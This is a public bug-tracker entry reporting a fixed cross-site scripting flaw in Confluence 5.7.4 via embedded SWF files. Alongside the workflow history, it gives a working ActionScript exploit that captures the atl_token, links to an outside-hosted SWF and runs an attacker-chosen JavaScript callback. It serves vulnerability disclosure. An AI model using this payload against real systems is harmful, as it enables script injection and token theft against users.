[CONFSERVER-38127] xss by swf file

Type: Bug
Resolution: Fixed
Priority: Low
Fix Version/s: 5.8.6
Affects Version/s: 5.7.4
Component/s: None
Labels:

CVSS Score:
4.9
Bug Fix Policy:
View Atlassian Server bug fix policy

In confluence comment module user can embed swf file in their comment, confluence are using a `atl_token` parameter on GET HTTP request, if the attacker send the link of .swf file( the value of src on embed tag) to his victim the malicious .SWF won't execute on the victim's browser .

We can bypass this protection by using this.loaderInfo.parameters in malicious .swf, this.loaderInfo.parameters.parameter_name extract the value of your target parameter, in this case it is atl_token , i also inserted a <a> tag in malicous swf file so if the victim clicks the link in our embed swf file the .swf file will be run in the victim's browser.

PAYLOAD

package
{
import flash.display.Sprite;
import flash.text.TextFormat;
import flash.text.TextField;
import flash.external.ExternalInterface;

public class Main extends Sprite
{

public function Main()
{
super();
var myFormat:TextFormat = new TextFormat();
myFormat.size = 200;
var xcode:String = this.loaderInfo.parameters.atl_token;
var myText:TextField = new TextField();
myText.width = 1000;
myText.height = 1000;
myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
addChild(myText);
ExternalInterface.call(this.loaderInfo.parameters.callback,"xss");
}
}
}

- - Sort By Name
  - Sort By Date
  - Ascending
  - Descending
  - Thumbnails
  - List

NewProject.swf
1 kB
06/Jul/2015 3:40 AM

mentioned in: Page Failed to load

Form Name

Katherine Yabut made changes - 13/Nov/2018 4:43 AM

Workflow

Original: JAC Bug Workflow v3 [ 2896289 ]

New: CONFSERVER Bug Workflow v4 [ 2988946 ]

Owen made changes - 11/Oct/2018 9:02 AM

Workflow	Original: JAC Bug Workflow v2 [ 2787435 ]	New: JAC Bug Workflow v3 [ 2896289 ]
Status	Original: Resolved [ 5 ]	New: Closed [ 6 ]

Owen made changes - 29/Aug/2018 11:15 PM

Workflow

Original: JAC Bug Workflow [ 2737509 ]

New: JAC Bug Workflow v2 [ 2787435 ]

Owen made changes - 02/Jul/2018 7:17 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2389939 ]

New: JAC Bug Workflow [ 2737509 ]

Camila Santos made changes - 16/May/2018 5:58 PM

Remote Link

Original: This issue links to "Page (Extranet)" [ 318158 ]

New: This issue links to "Page (Extranet)" [ 318158 ]

Eduardo Mallmann (Inactive) made changes - 04/Sep/2017 4:55 PM

Remote Link

New: This issue links to "Page (Extranet)" [ 318158 ]

Katherine Yabut made changes - 22/Jun/2017 6:50 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 [ 2268597 ]

New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2389939 ]

Katherine Yabut made changes - 31/May/2017 5:31 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2212803 ]

New: Confluence Workflow - Public Facing - Restricted v5 [ 2268597 ]

Katherine Yabut made changes - 31/May/2017 4:54 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2160632 ]

New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2212803 ]

Katherine Yabut made changes - 31/May/2017 1:56 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 [ 1951463 ]

New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2160632 ]

Assignee:: Phong Quoc Le (Inactive)

Reporter:: adrianbelen NA

Affected customers:: 0 This affects my team

Watchers:: 2 Start watching this issue

Created:: 02/Jul/2015 3:27 AM

Updated:: 11/Oct/2018 9:02 AM

Resolved:: 16/Jul/2015 3:15 AM

Details

Description

Attachments

Attachments

Issue Links

Forms

Activity

People

Dates